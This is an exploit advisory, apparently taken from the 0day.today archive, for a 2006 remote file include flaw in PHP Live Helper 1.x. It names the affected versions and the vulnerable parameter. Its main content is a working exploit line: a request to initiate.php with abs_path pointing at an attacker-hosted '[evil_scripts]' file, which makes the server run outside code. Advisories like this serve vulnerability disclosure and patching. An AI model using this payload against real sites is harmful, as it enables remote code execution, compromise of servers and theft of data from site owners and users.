PHP Live Helper <= 1.x (abs_path) Remote File Include Vulnerability

2006-06-18T00:00:00
ID 1337DAY-ID-527
Type zdt
Reporter SnIpEr_SA
Modified 2006-06-18T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
PHP Live Helper <= 1.x (abs_path) Remote File Include Vulnerability
===================================================================




---------------------------------------------------------------------------
PHP Live Helper <=([abs_path]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By SnIpEr_SA
Author : SnIpEr_SA
Remote : Yes
Local : No
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : PHP Live Helper
version : 1.5 and last version
URL :http://www.live-helper.com/

------------------------------------------------------------------
Exploit:
~~~~~~~~

# http://www.site.com/[livehelperpath]/initiate.php?abs_path=[evil_scripts]

---------------------------------------------------------------------------

*/

Contact:
~~~~~~~~

SnIpEr_SA
Greetz: All My Frind
/*

-------------------------------- [ END ] ----------------------------------



#  0day.today [2018-04-09]  #